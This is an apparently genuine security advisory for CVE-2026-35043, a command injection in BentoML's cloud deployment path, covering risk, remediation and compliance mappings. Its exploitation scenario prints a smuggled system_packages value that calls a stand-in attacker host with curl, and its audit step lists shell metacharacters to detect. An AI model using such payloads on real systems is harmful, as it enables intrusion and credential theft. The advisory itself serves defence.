CVE-2026-35043: BentoML: cmd injection RCE on cloud build infra

GHSA-fgv4-6jr3-jgfw HIGH CISA: ATTEND
Published April 3, 2026
CISO Take

BentoML's incomplete patch (<=1.4.37) leaves the cloud deployment path vulnerable to command injection via bentofile.yaml system_packages, enabling RCE on BentoCloud or self-hosted Yatai build infrastructure. Any team deploying BentoML models to BentoCloud must upgrade to 1.4.38 immediately — the original fix patched the wrong code path, creating false confidence. If deployments occurred between the partial patch and 1.4.38, treat build environment credentials as compromised and rotate.

What is the risk?

HIGH risk with a deceptive twist: the incomplete fix in commit ce53491 patched images.py and Jinja2 templates but missed deployment.py:1648 — the cloud deployment path. This creates false confidence for teams who track patch commits rather than full code audits. Exploitability is trivial: a single YAML entry with a semicolon achieves shell breakout. The payload lands on build infrastructure, which typically holds container registry write credentials, cloud provider IAM tokens, and cross-tenant access, making this a high-value lateral movement pivot. Exposure is scoped to BentoCloud users and self-hosted Yatai/Kubernetes deployments; local-only builds are not affected.

What systems are affected?

Package Ecosystem Vulnerable Range Patched
BentoML pip <= 1.4.37 1.4.38
8.7K OpenSSF 6.4 21 dependents Pushed 12d ago 55% patched ~14d to patch Full package profile →

Do you use BentoML? You're affected.

How severe is it?

CVSS 3.1
7.8 / 10
EPSS
0.3%
chance of exploitation in 30 days
Higher than 23% of all CVEs
Exploitation Status
Exploit Available
Exploitation: MEDIUM
Sophistication
Trivial
Exploitation Confidence
medium
CISA SSVC: Public PoC
Composite signal derived from CISA KEV, VulnCheck KEV, CISA SSVC, EPSS, Metasploit, Exploit-DB, trickest/cve, Nuclei templates, and inthewild.io exploitation reports.

What is the attack surface?

AV AC PR UI S C I A
AV Local
AC Low
PR None
UI Required
S Unchanged
C High
I High
A High

What should I do?

5 steps
  1. PATCH

    Upgrade bentoml to 1.4.38 immediately — the fix adds shlex.quote() to each package in deployment.py:1648, neutralizing shell metacharacters.

  2. AUDIT

    Grep all bentofile.yaml files in repositories and CI pipelines for system_packages values containing semicolons, backticks, $(), ${IFS}, or pipe characters.

  3. DETECT

    Review BentoCloud build logs for anomalous outbound network connections or unexpected commands executing during container setup phase.

  4. ROTATE

    If any BentoCloud deployments occurred between the partial patch (commit ce53491) and 1.4.38 release, assume build environment credentials are potentially compromised — rotate cloud API keys, registry tokens, and all secrets present in the build environment.

  5. GATE

    Add pre-deployment CI validation to reject bentofile.yaml files with system_packages values matching shell metacharacter patterns as a defense-in-depth control.

What does CISA's SSVC say?

Decision Attend
Exploitation poc
Automatable No
Technical Impact total

Source: CISA Vulnrichment (SSVC v2.0). Decision based on the CISA Coordinator decision tree.

How is it classified?

Which compliance frameworks are affected?

This CVE is relevant to:

EU AI Act
Article 15 - Accuracy, robustness and cybersecurity
ISO 42001
A.8.2 - AI system development and supply chain
NIST AI RMF
GOVERN 6.1 - Policies and procedures for AI supply chain risk management MANAGE 2.2 - Mechanisms to respond to and recover from AI risk events
OWASP LLM Top 10
LLM05:2025 - Supply Chain Vulnerabilities

Frequently Asked Questions

What is CVE-2026-35043?

BentoML's incomplete patch (<=1.4.37) leaves the cloud deployment path vulnerable to command injection via bentofile.yaml system_packages, enabling RCE on BentoCloud or self-hosted Yatai build infrastructure. Any team deploying BentoML models to BentoCloud must upgrade to 1.4.38 immediately — the original fix patched the wrong code path, creating false confidence. If deployments occurred between the partial patch and 1.4.38, treat build environment credentials as compromised and rotate.

Is CVE-2026-35043 actively exploited?

No confirmed active exploitation of CVE-2026-35043 has been reported, but organizations should still patch proactively.

How to fix CVE-2026-35043?

1. PATCH: Upgrade bentoml to 1.4.38 immediately — the fix adds shlex.quote() to each package in deployment.py:1648, neutralizing shell metacharacters. 2. AUDIT: Grep all bentofile.yaml files in repositories and CI pipelines for system_packages values containing semicolons, backticks, $(), ${IFS}, or pipe characters. 3. DETECT: Review BentoCloud build logs for anomalous outbound network connections or unexpected commands executing during container setup phase. 4. ROTATE: If any BentoCloud deployments occurred between the partial patch (commit ce53491) and 1.4.38 release, assume build environment credentials are potentially compromised — rotate cloud API keys, registry tokens, and all secrets present in the build environment. 5. GATE: Add pre-deployment CI validation to reject bentofile.yaml files with system_packages values matching shell metacharacter patterns as a defense-in-depth control.

What systems are affected by CVE-2026-35043?

This vulnerability affects the following AI/ML architecture patterns: MLOps deployment pipelines, cloud model serving, CI/CD build infrastructure, containerized model deployment.

What is the CVSS score for CVE-2026-35043?

CVE-2026-35043 has a CVSS v3.1 base score of 7.8 (HIGH). The EPSS exploitation probability is 0.32%.

What is the AI security impact?

Affected AI Architectures

MLOps deployment pipelinescloud model servingCI/CD build infrastructurecontainerized model deployment

MITRE ATLAS Techniques

AML.T0010.001 AI Software
AML.T0025 Exfiltration via Cyber Means
AML.T0050 Command and Scripting Interpreter
AML.T0055 Unsecured Credentials
AML.T0079 Stage Capabilities

Compliance Controls Affected

EU AI Act: Article 15
ISO 42001: A.8.2
NIST AI RMF: GOVERN 6.1, MANAGE 2.2
OWASP LLM Top 10: LLM05:2025

What are the technical details?

Original Advisory

BentoML is a Python library for building online serving systems optimized for AI apps and model inference. Prior to 1.4.38, the cloud deployment path in src/bentoml/_internal/cloud/deployment.py was not included in the fix for CVE-2026-33744. Line 1648 interpolates system_packages directly into a shell command using an f-string without any quoting. The generated script is uploaded to BentoCloud as setup.sh and executed on the cloud build infrastructure during deployment, making this a remote code execution on the CI/CD tier. This vulnerability is fixed in 1.4.38.

Exploitation Scenario

A threat actor publishes a BentoML model to a public hub (Hugging Face, internal model registry) with a bentofile.yaml containing a poisoned system_packages entry: 'jq;curl${IFS}https://c2.attacker.com/beacon?h=$(hostname|base64)${IFS}#'. When a target organization's MLOps engineer deploys this bento to BentoCloud, BentoML generates a setup.sh with the injected command, uploads it via the legitimate deployment API, and the cloud build node executes it during container initialization. The attacker receives a beacon from the build node, then uses the established callback to enumerate and exfiltrate container registry credentials and cloud IAM tokens from the build environment. With registry write access, the attacker can poison downstream container images, achieving persistent supply chain compromise across the victim's AI deployment pipeline.

Weaknesses (CWE)

CWE-78 — Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection'): The product constructs all or part of an OS command using externally-influenced input from an upstream component, but it does not neutralize or incorrectly neutralizes special elements that could modify the intended OS command when it is sent to a downstream component.

  • [Architecture and Design] If at all possible, use library calls rather than external processes to recreate the desired functionality.
  • [Architecture and Design, Operation] Run the code in a "jail" or similar sandbox environment that enforces strict boundaries between the process and the operating system. This may effectively restrict which files can be accessed in a particular directory or which commands can be executed by the software. OS-level examples include the Unix chroot jail, AppArmor, and SELinux. In general, managed code may provide some protection. For example, java.io.FilePermission in the Java SecurityManager allows the software to specify restrictions on file operations. This may not be a feasible solution, and it only limits the impact to the operating system; the rest of the application may still be subject to compromise. Be careful to avoid CWE-243 and other weaknesses related to jails.

Source: MITRE CWE corpus.

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H

Timeline

Published
April 3, 2026
Last Modified
April 7, 2026
First Seen
April 4, 2026

Related Vulnerabilities